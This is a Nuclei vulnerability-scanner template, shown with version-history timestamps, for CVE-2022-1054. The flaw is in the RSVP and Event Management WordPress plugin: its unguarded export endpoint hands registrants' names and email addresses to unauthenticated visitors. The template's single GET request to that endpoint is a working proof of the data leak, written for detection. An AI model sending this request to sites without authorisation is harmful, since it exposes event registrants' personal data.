nuclei-templates/cves/2022/CVE-2022-1054.yaml

34 lines
1.1 KiB
YAML
Raw Normal View History

2022-04-20 22:51:08 +00:00
id: CVE-2022-1054
info:
name: RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export
author: Akincibor
severity: medium
2022-04-22 16:29:43 +00:00
description: The RSVP and Event Management Plugin WordPress plugin before 2.7.8 does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of user registered for events
2022-04-20 22:51:08 +00:00
reference:
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
2022-04-22 16:29:43 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
2022-04-22 16:29:43 +00:00
cve-id: CVE-2022-1054
cwe-id: CWE-862
tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin
2022-04-20 22:51:08 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'RSVP Status'
2022-04-22 13:27:48 +00:00
- '"First Name"'
condition: and
2022-04-20 22:51:08 +00:00
- type: status
status:
- 200